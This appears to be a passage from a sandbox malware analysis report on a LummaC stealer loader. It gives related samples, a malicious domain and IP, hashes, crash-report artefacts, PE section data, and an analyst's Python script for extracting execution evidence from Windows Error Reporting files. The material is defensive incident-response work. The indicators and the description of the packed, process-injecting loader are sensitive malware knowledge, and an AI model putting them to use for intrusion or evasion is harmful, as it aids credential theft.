 | 1719520929.094843_setup.exe | malicious | LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar | 188.114.96.3
 | PO-MISA-32493.cmd | malicious | Remcos, DBatLoader | 188.114.96.3
 | External24.exe | malicious | RisePro Stealer | 188.114.96.3
 | test.exe | malicious | LummaC | 188.114.96.3

The IP and ASN matches are weak pivots on their own: 188.114.96.3 is a shared Cloudflare edge address, and the same ASN fronts the HTMLPhisher, FormBook and Mirai samples listed. The JA3 value a0e9f5d64349fb13191bc781f81f42e1 also recurs across unrelated families (Remcos, RisePro, HTMLPhisher), so it fingerprints the client TLS stack of the injected host process rather than LummaC itself. The domain match (potterryisiw.shop, previously seen in a multi-stealer PrivateLoader drop) is the pivot worth following.

Dropped files context: no context
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.0525382419946387
      Encrypted:false
      SSDEEP:192:C5EjjeFy/L+xDxf0BU/AjezEKTczuiF8Z24IO8Z:oEjtL+FKBU/AjeNczuiF8Y4IO8Z
      MD5:E78EF36D7541004A2B31A50E2604F593
      SHA1:68C69A69B98877BD31FB192D83EB6ADA83369FE8
      SHA-256:1F6D5D1CD4456FE3BEA61FC7973012B29B9B0808FDC128CEB58884F32792B5D6
      SHA-512:4B758C5B33B73D54C7866D276538CC01F6BB08F2CFD500014C4506B95780F10FAA15F557EED02BBEBF1A929323A428D0E36B0B892C44D710DBE518245DA6899B
      Malicious:false
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.2.2.4.1.5.3.0.8.5.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.2.2.4.2.0.3.0.8.5.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.4.1.0.0.b.a.-.9.3.2.4.-.4.e.3.f.-.b.b.f.5.-.c.9.1.5.1.6.0.1.b.3.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.3.3.4.d.2.a.-.0.9.8.e.-.4.9.c.5.-.9.8.7.9.-.8.d.0.e.4.e.5.a.b.e.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.0.-.0.0.0.1.-.0.0.1.4.-.9.f.e.e.-.5.f.9.4.8.7.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.7141568706699232
      Encrypted:false
      SSDEEP:192:yMoSAUWOQl0BU/gjuGzuiF8Z24IO8LJL:8SAUWOQGBU/gjfzuiF8Y4IO8L
      MD5:4DD92C98AF76544D029865DBEC08EE85
      SHA1:AD328AC3C2533AA4A56F6D44CCBCF93E501864EC
      SHA-256:F2CBE1527262D637C015C18289EADD8E6364ABF7E8C574E2022222DB5AFA1934
      SHA-512:9B56473259E156EEC6708339DD7E4CADD2BC0C8DF33585F7AD8320A7C0269BE879AFC6BB45E78E8D3244293C7049C5C694DDA1C6CA900BFC381E3065690624D6
      Malicious:true
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.2.2.1.4.2.0.4.9.1.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.2.2.1.4.5.7.9.9.1.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.9.2.f.d.5.b.-.a.8.4.f.-.4.d.6.4.-.8.4.9.3.-.3.8.f.8.9.d.5.1.5.7.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.0.2.e.8.5.5.-.4.8.3.b.-.4.7.c.d.-.a.e.c.2.-.9.5.e.4.f.5.e.3.9.a.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.k.F.O.Y.0.1.G.l.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.a.8.-.0.0.0.1.-.0.0.1.4.-.b.c.5.5.-.f.c.9.3.8.7.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.d.6.e.e.8.c.c.d.9.b.e.7.5.1.5.1.f.b.e.7.e.f.3.8.6.0.5.8.9.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.2.d.f.6.e.3.3.4.7.0.8.e.a.e.8.1.0.a.7.4.b.8.4.4.f.d.5.7.e.1.8.e.9.f.d.c.3.4.c.d.!.m.k.F.O.Y.0.1.G.l.5...e.x.e.....T.a.r.g.e.t.A.p.p.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Mon Jul 1 07:23:34 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):46170
      Entropy (8bit):1.7551058547418887
      Encrypted:false
      SSDEEP:96:528lJE7AwOa8UeSvgsi7X9UnjP97j5VKR9XcMFcoZFuRejWBb//04LKbWIkWIXpt:H8tvHOMHKzt0eCeWjfFlp60
      MD5:EBDF3DF5FC96E4314804B116E51DE50D
      SHA1:EBEFD2E60C1D5B4DF4A14F448F06399AF91AD181
      SHA-256:D39D0B1EFEED58E2CA55D6A9F7C5B10A91353AA4CBEDE15297DFEBFA0D358D9E
      SHA-512:4E96F8D0A62C59CBBDB9799F384291C88B22C996794A84AC69E0F07EFE6C55CC08A634D33A3B11716E5D3E47226D013A5DE3744D2CB6ADC6E76207715B98A7FA
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... .......vY.f........................0...........d...n$..........T.......8...........T..........................,...........................................................................................eJ..............GenuineIntel............T...........tY.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8302
      Entropy (8bit):3.6998500413426703
      Encrypted:false
      SSDEEP:192:R6l7wVeJto6tpWX6YEI6SUH5NgmfeJDrpr089bRpsfCObm:R6lXJi6tW6YE1SUH5NgmfeJD3RCfCj
      MD5:EAFCA40006C6C316D90BEE485653765D
      SHA1:4DFA12C4883F817D7BC8F98FEC3B6438745FEE74
      SHA-256:AD230542FCB010F87101EC8B1A07AC2C1EFD74627CDCDC98C492A48B26F0B4D0
      SHA-512:1C83960C2548F44F929BD1A74D51A5F863796D7F04486967F44884F07E6F7E908B0C779474E4861F4D556E26AB8F299701D4E2AE9E93B4A3DF7B5A3F4EB8FB7B
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.5.6.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4585
      Entropy (8bit):4.465536815918837
      Encrypted:false
      SSDEEP:48:cvIwWl8zsyJg77aI9ROWpW8VYQ0Ym8M4Jp8fiFqFNDo+q8o80u0nW0ud:uIjfAI77v7VbJp8bF9o5Bu0nW0ud
      MD5:0B77D030B7EF4018AA735B7A93CF17AF
      SHA1:E8816154930087222CBEB3C0C20CCE8EED97E7D9
      SHA-256:ADBE23635D4ECD53D821FD2A3A4C238CAD0C53BD11BA10A276F76972FDB0ADCC
      SHA-512:278A539C5B6F12A77574F1810D184F47764FECE3B1C2CCEE96CD9EC6DFA6DBD744F1C414D37B010A21A4C5ABF8346A0DBDA8416FB36E7D41B4241FC54C99DA8D
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Mon Jul 1 07:24:01 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):101108
      Entropy (8bit):2.087840884203208
      Encrypted:false
      SSDEEP:384:AI5H5paX5X75HnEfEkxYaUCvZb9LaWQhLiyMDy3XO3yjC4Vq75Z6D1ubH3Pg3zIj:A8uZ5nEf7kWQL9OCpIj
      MD5:E63835EB24058CCE2709C6C3D1A04320
      SHA1:642C768FA1C31DB01ACFC1671702813DF072EF0C
      SHA-256:FABF541552024AA176A63EEDAD79BB608770C053CCE35C86AC9726043CF98A58
      SHA-512:4ACB13BDE6957BDF4F41AB28A6D9E5FF2B6B158A89F86AEAC70852C94C2221A6F2657B48D9B816518A6AE62B775DCF188A7F0B23D3F8F5D8C96EDE947BAD8F22
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... ........Y.f.........................................#......d....J..........`.......8...........T............B...H..........(%...........'..............................................................................eJ.......'......GenuineIntel............T....... ...uY.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8294
      Entropy (8bit):3.6999052158755275
      Encrypted:false
      SSDEEP:192:R6l7wVeJot63sr9e6Y9v6thWXgmf811rprO89bI8Rsf2WYm:R6lXJa6cI6Y16tegmfERI8Kf2Q
      MD5:083EA18287B1CC5FCA85B385211A203C
      SHA1:D71C8757AF304C6ED61608C2246F18FCB3037DFA
      SHA-256:CA0BFD84475392D6B934F25A2E6BE63482E034F516D2847DC0734A642D784700
      SHA-512:9FE6C2E3B13E1FB88ED0889A2EE6B835A3568001BF5BCB7F1C9395FB118C27879657BA3CF3FFED9DA846C916826AA153E3A33C529D45DFECC18E0C3690441970
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.7.6.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4628
      Entropy (8bit):4.448620318724153
      Encrypted:false
      SSDEEP:48:cvIwWl8zsyJg77aI9ROWpW8VYCYm8M4JfuAsQF6sCj+q8olVuQgLuOLuWrd:uIjfAI77v7VyJfuLtZvlgBukuWrd
      MD5:7FD1633C49059A3588F37F550D4A0872
      SHA1:5D9F8E7B6F335F4DE3531F4B7712EBF4A14E9878
      SHA-256:D70D2C34C160C62C389D15B4EFC4367A7E3834A609FFCC3CF0CEED92471FE5E1
      SHA-512:D3877FA69A7976DEAEC601B1454C4624D2D3B16697A1A7ED73554C5707EA21EB78C2D6463E7E1F1E270E4F41CB63B4BB65EBE11ECE9E30762C04456DF77E3F1D
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="391586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.4251801333705565
      Encrypted:false
      SSDEEP:6144:BSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNl0uhiTw:YvloTyW+EZMM6DFyD03w
      MD5:A2A5BF6F5D9FBB49F263B40CF802033B
      SHA1:E85AF25CFFD99F90D093D9C9437DBD2C3734D855
      SHA-256:A096EC5DCD763AD9224659C670FEFE9BEF2389CDD582C56601EB59B808622998
      SHA-512:0BF4E231F06EE1D21E7C90417F34715AB0DD06DFB55DBFC9075B1182FED169EC2236A171D0E3D65C15E65E40D3A8F24DE551E486DD51FD0740A59DE7F99EB874
      Malicious:false
      Reputation:low
      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
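The dropped files above are all Windows Error Reporting output: two Report.wer records plus minidumps for the sample (crashed at 07:23:34 UTC) and for the injected RegAsm.exe host (crashed at 07:24:01 UTC), and the Amcache hive WerFault read. The second Report.wer is flagged Malicious: true only because its TargetAppId field embeds the sample's name and SHA1 (2df6e334708eae810a74b844fd57e18e9fdc34cd, visible in the preview); the file itself is telemetry, not a payload. The Python below is an added example, not part of the Joe Sandbox report, showing how an incident responder turns such a record into evidence: it decodes the UTF-16LE file, extracts the SHA1 from TargetAppId, converts the FILETIME EventTime, and checks the hash against the known sample. The two byte strings are constructed from the fields visible in the previews, not copied files.

```python
from __future__ import annotations

import re
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional, Set

# SHA1 of the submitted sample, from the report header.
SAMPLE_SHA1 = "2df6e334708eae810a74b844fd57e18e9fdc34cd"


def _wer_bytes(text: str) -> bytes:
    """Report.wer files are UTF-16LE with a BOM and CRLF line endings."""
    return b"\xff\xfe" + text.encode("utf-16-le")


# Constructed from the fields visible in the two Report.wer previews above;
# only the lines needed for the check are reproduced.
MKFOY_WER = _wer_bytes(
    "Version=1\r\nEventType=APPCRASH\r\nEventTime=133642922142049173\r\n"
    "ReportType=2\r\nConsent=1\r\nNsAppName=mkFOY01Gl5.exe\r\n"
    "TargetAppId=W:00062d6ee8ccd9be75151fbe7ef3860589270000ffff"
    "!00002df6e334708eae810a74b844fd57e18e9fdc34cd!mkFOY01Gl5.exe\r\n"
)
REGASM_WER = _wer_bytes(
    "Version=1\r\nEventType=APPCRASH\r\nEventTime=133642922415308562\r\n"
    "ReportType=2\r\nConsent=1\r\nNsAppName=RegAsm.exe\r\nOriginalFilename=RegAsm.exe\r\n"
    "TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000"
    "!0000230ab5559e806574d26b4c20847c368ed55483b0!\r\n"
)

# TargetAppId = W:<44 hex>!0000<SHA1 of the crashing image>!<image name>
TARGET_APP_ID = re.compile(r"^W:[0-9a-fA-F]+!0000([0-9a-fA-F]{40})!(.*)$")


def parse_wer(data: bytes) -> Dict[str, str]:
    """Decode a Report.wer into a key -> value map (the first '=' separates them)."""
    if data[:2] == b"\xff\xfe":
        data = data[2:]
    fields: Dict[str, str] = {}
    for line in data.decode("utf-16-le").splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def target_sha1(fields: Dict[str, str]) -> Optional[str]:
    """SHA1 of the crashed image, carried in TargetAppId."""
    m = TARGET_APP_ID.match(fields.get("TargetAppId", ""))
    return m.group(1).lower() if m else None


def filetime_to_iso(filetime: int) -> str:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to ISO 8601."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return (epoch + timedelta(microseconds=filetime // 10)).strftime("%Y-%m-%dT%H:%M:%SZ")


def triage_wer(data: bytes, known_sha1: Set[str]) -> dict:
    """Summarise one crash report and say whether it belongs to a known sample."""
    f = parse_wer(data)
    sha1 = target_sha1(f)
    event_time = f.get("EventTime", "")
    return {
        "app": f.get("NsAppName"),
        "event": f.get("EventType"),
        "time_utc": filetime_to_iso(int(event_time)) if event_time.isdigit() else None,
        "sha1": sha1,
        "known_sample": sha1 in known_sha1,
    }


if __name__ == "__main__":
    for blob in (MKFOY_WER, REGASM_WER):
        print(triage_wer(blob, {SAMPLE_SHA1}))
```

On a real host the same records live under C:\ProgramData\Microsoft\Windows\WER\ReportQueue and ReportArchive and survive after the malware is gone, so the decoded EventTime and SHA1 give a timestamped proof of execution even when the binary was deleted; the RegAsm.exe report resolves to Microsoft's own image hash and shows which legitimate process was hollowed.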
      File type:PE32 executable (console) Intel 80386, for MS Windows
      Entropy (8bit):7.661614937929796
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:mkFOY01Gl5.exe
      File size:528'384 bytes
      MD5:0309dd0131150796ea99b30a62194fae
      SHA1:2df6e334708eae810a74b844fd57e18e9fdc34cd
      SHA256:07c09ba5a84f619e5b83a54298ffc58d20b00f14399c7a94b7f02b70efc60f35
      SHA512:3d4e5a0718d04fee92d8040880b631107d1e23a6b3bce430d58769179af999c28b99e50c5cd45f283339f7bbb24ffacbf601a5447edb12e28da4517fbfa282e8
      SSDEEP:12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
      TLSH:6FB4F10275C08072D573113605F8DBB86E3EB9704F6599CF97941B7E8F202E2FA35A6A
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x...+...+...+z..*...+z..*...+z..*...+k\.*...+k\.*...+z..*...+...+(..+k\.*...+Z_.*...+Z_.*...+Z_.*...+Rich...+........PE..L..
      Icon Hash:00928e8e8686b000
      Entrypoint:0x407452
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Time Stamp:0x66810EB7 [Sun Jun 30 07:52:23 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:6
      OS Version Minor:0
      File Version Major:6
      File Version Minor:0
      Subsystem Version Major:6
      Subsystem Version Minor:0
      Import Hash:bea8657593f34831fef16a15915f462d
      Instruction
      call 00007FCFAC6482AEh
      jmp 00007FCFAC647969h
      push ebp
      mov ebp, esp
      mov eax, dword ptr [ebp+08h]
      push esi
      mov ecx, dword ptr [eax+3Ch]
      add ecx, eax
      movzx eax, word ptr [ecx+14h]
      lea edx, dword ptr [ecx+18h]
      add edx, eax
      movzx eax, word ptr [ecx+06h]
      imul esi, eax, 28h
      add esi, edx
      cmp edx, esi
      je 00007FCFAC647B0Bh
      mov ecx, dword ptr [ebp+0Ch]
      cmp ecx, dword ptr [edx+0Ch]
      jc 00007FCFAC647AFCh
      mov eax, dword ptr [edx+08h]
      add eax, dword ptr [edx+0Ch]
      cmp ecx, eax
      jc 00007FCFAC647AFEh
      add edx, 28h
      cmp edx, esi
      jne 00007FCFAC647ADCh
      xor eax, eax
      pop esi
      pop ebp
      ret
      mov eax, edx
      jmp 00007FCFAC647AEBh
      push esi
      call 00007FCFAC648584h
      test eax, eax
      je 00007FCFAC647B12h
      mov eax, dword ptr fs:[00000018h]
      mov esi, 004801F0h
      mov edx, dword ptr [eax+04h]
      jmp 00007FCFAC647AF6h
      cmp edx, eax
      je 00007FCFAC647B02h
      xor eax, eax
      mov ecx, edx
      lock cmpxchg dword ptr [esi], ecx
      test eax, eax
      jne 00007FCFAC647AE2h
      xor al, al
      pop esi
      ret
      mov al, 01h
      pop esi
      ret
      push ebp
      mov ebp, esp
      cmp dword ptr [ebp+08h], 00000000h
      jne 00007FCFAC647AF9h
      mov byte ptr [004801F4h], 00000001h
      call 00007FCFAC647DAAh
      call 00007FCFAC64AB17h
      test al, al
      jne 00007FCFAC647AF6h
      xor al, al
      pop ebp
      ret
      call 00007FCFAC6542E4h
      test al, al
      jne 00007FCFAC647AFCh
      push 00000000h
      call 00007FCFAC64AB1Eh
      pop ecx
      jmp 00007FCFAC647ADBh
      mov al, 01h
      pop ebp
      ret
      push ebp
      mov ebp, esp
      cmp byte ptr [004801F5h], 00000000h
      je 00007FCFAC647AF6h
      mov al, 01h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2f5c0 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2f610 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x81000 | 0x1d1c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2d868 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2d7a8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x25000 | 0x164 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x22e06 | 0x23000 | bcfd4743919a7287f45509a4c87268d7 | False | 0.5696707589285714 | data | 6.6395354102405175 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.BsS | 0x24000 | 0xe1d | 0x1000 | cd00c5aad3fabcefbb666ed38bc94e75 | False | 0.571044921875 | data | 5.9592480997149915 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x25000 | 0xae34 | 0xb000 | 269cf7a3d1bfd5dc301125bba1094a1e | False | 0.42329545454545453 | data | 5.043395030886215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x30000 | 0x50cf4 | 0x4fe00 | 20ba1805648860606c3ba6a2c47c9c18 | False | 0.9885318857589984 | data | 7.990757511119703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x81000 | 0x1d1c | 0x1e00 | 1fc36b079fe1a28d899aecb42986d0b4 | False | 0.76484375 | data | 6.493243062616553 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

The .data section alone is 0x4fe00 bytes, about 62% of the 528'384-byte file, at an entropy of 7.99 and a ZLIB complexity of 0.99 (it does not compress), and it is writable: that is the profile of an encrypted blob that is unpacked at runtime, consistent with the encrypted-strings and PE-injection signatures listed above. The two code sections together (.text plus the non-standard, executable .BsS) hold only about 143 KB, which is the loader.
DLL | Import
USER32.dll | OffsetRect
